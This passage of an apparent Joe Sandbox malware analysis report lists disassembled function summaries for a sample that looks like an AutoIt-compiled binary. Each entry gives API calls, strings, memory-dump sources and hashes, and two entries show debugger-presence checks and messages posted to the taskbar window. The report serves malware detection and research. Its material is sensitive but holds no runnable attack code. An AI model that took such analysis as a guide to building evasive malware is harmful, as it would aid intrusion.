                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: cdf6132a38119be29a2e965d6b74dff76efc82b02635fedade89a1ec2312b9da
                                                            • Instruction ID: 5134c1d01654e9e8e230317003c9b26551574df0972275876a3701a343945761
                                                            • Opcode Fuzzy Hash: cdf6132a38119be29a2e965d6b74dff76efc82b02635fedade89a1ec2312b9da
                                                            • Instruction Fuzzy Hash: E3012671B45108BBCF13EBA4C992EFE73ACCF21304F10402AB901AB6D2DE258E08D671
                                                            Function 003BC4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 003BC534
                                                              • Part of subcall function 003BC816: _memmove.LIBCMT ref: 003BC860
                                                              • Part of subcall function 003BC816: VariantInit.OLEAUT32(00000000), ref: 003BC882
                                                              • Part of subcall function 003BC816: VariantCopy.OLEAUT32(00000000,?), ref: 003BC88C
                                                            • VariantClear.OLEAUT32(?), ref: 003BC556
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Variant$Init$ClearCopy_memmove
                                                            • String ID: d}A
                                                            • API String ID: 2932060187-735431763
                                                            • Opcode ID: 353175da059a3566167b33c11df88f4dff068dc0551ce9d0e6922e69ef1a3fc8
                                                            • Instruction ID: 189d5d19045e8fbaf5d52fc7a489cccaaccc922b93c03619368bf55e9d55031b
                                                            • Opcode Fuzzy Hash: 353175da059a3566167b33c11df88f4dff068dc0551ce9d0e6922e69ef1a3fc8
                                                            • Instruction Fuzzy Hash: 7111FAB19007089FC721DFAAD8C49DAB7F8FB08314B50862FE58AD7651E771AA44CF90
                                                            Function 003C4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp
                                                            • String ID: #32770
                                                            • API String ID: 2292705959-463685578
                                                            • Opcode ID: 60ce87ff259e2b3178113e6f6eb6e51d10f75e181b5d46c18476902616482991
                                                            • Instruction ID: 96837803a5a51cfffb10cb8debc2d8c2558013f16f3f7af9938bd93dd1e236fa
                                                            • Opcode Fuzzy Hash: 60ce87ff259e2b3178113e6f6eb6e51d10f75e181b5d46c18476902616482991
                                                            • Instruction Fuzzy Hash: 62E092326002282AD720AA99AC49FE7FBACEB45B60F01016BFD04D7151D9709B458BE4
                                                            Function 0039B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0039B314: _memset.LIBCMT ref: 0039B321
                                                              • Part of subcall function 00380940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0039B2F0,?,?,?,0036100A), ref: 00380945
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,0036100A), ref: 0039B2F4
                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0036100A), ref: 0039B303
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0039B2FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 3158253471-631824599
                                                            • Opcode ID: 8d85533ed8d975ae662a2afd674d57d8e7904306660bb327c6e864706f990115
                                                            • Instruction ID: d35f21fa7d16cdec57c69859374dd6cafb3434ad6ed6fda06f299a5aa10b4d72
                                                            • Opcode Fuzzy Hash: 8d85533ed8d975ae662a2afd674d57d8e7904306660bb327c6e864706f990115
                                                            • Instruction Fuzzy Hash: 8AE06D782007408FDB32DF28E648342BAE8AF00704F008A7DE496CB2D0E7F4E408CBA1
                                                            Function 003B7C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003B7C82
                                                              • Part of subcall function 00383358: _doexit.LIBCMT ref: 00383362
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Message_doexit
                                                            • String ID: AutoIt$Error allocating memory.
                                                            • API String ID: 1993061046-4017498283
                                                            • Opcode ID: cae6742ca2a91461044da16d850d470a6125a08ae2746973efcf6de451e0ab83
                                                            • Instruction ID: 2a21e76e0269d331145360434996a667a21cb6c3dccd123ad811602d70a64856
                                                            • Opcode Fuzzy Hash: cae6742ca2a91461044da16d850d470a6125a08ae2746973efcf6de451e0ab83
                                                            • Instruction Fuzzy Hash: 52D05E323C836837D21732B9AC07FDA7A888F05F56F144466FB18AE5D389D6998142ED
                                                            Function 003A1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?), ref: 003A1775
                                                              • Part of subcall function 003DBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,003A195E,?), ref: 003DBFFE
                                                              • Part of subcall function 003DBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 003DC010
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 003A196D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                            • String ID: WIN_XPe
                                                            • API String ID: 582185067-3257408948
                                                            • Opcode ID: 51288a6b098ac58857904c098e7daf878c8ce6310a3f3bde82dd3f85f7db5b3d
                                                            • Instruction ID: 4d4d90395e2818c632199c0688090993c9bf0f229018270359951952774a008e
                                                            • Opcode Fuzzy Hash: 51288a6b098ac58857904c098e7daf878c8ce6310a3f3bde82dd3f85f7db5b3d
                                                            • Instruction Fuzzy Hash: 3DF0C971800109DFDB27DB91CA84AECBBFCEB09301F552095E142A6590D7724F85DF64
                                                            Function 003E5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003E596E
                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003E5981
                                                              • Part of subcall function 003C5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C52BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: b6e4dedabe1020cd57273653b776672bf31bde4c5a96328eed82b36d0965e62a
                                                            • Instruction ID: ce929a98e844ed08f54984c0c7fe34e9c490117d6fde123694fd66adeb71f74b
                                                            • Opcode Fuzzy Hash: b6e4dedabe1020cd57273653b776672bf31bde4c5a96328eed82b36d0965e62a
                                                            • Instruction Fuzzy Hash: 7ED0C931384351BBE675AB709C8BFD66A59AB50B55F100929B249AE1D0CAE4A840C658
                                                            Function 003E5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003E59AE
                                                            • PostMessageW.USER32(00000000), ref: 003E59B5
                                                              • Part of subcall function 003C5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C52BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 366c5114612f7ec8b428676750c5aa941f7f43ae8865bbf0661fa42eff87e07c
                                                            • Instruction ID: 84e231b2c468f738997c523c5ae52bbac75b81aaf2d1763aea9cd3865517e98f
                                                            • Opcode Fuzzy Hash: 366c5114612f7ec8b428676750c5aa941f7f43ae8865bbf0661fa42eff87e07c
                                                            • Instruction Fuzzy Hash: B5D0A9313803007BE675AB309C8BFC26A18AB40B00F000829B205EE1D0CAE0A800C658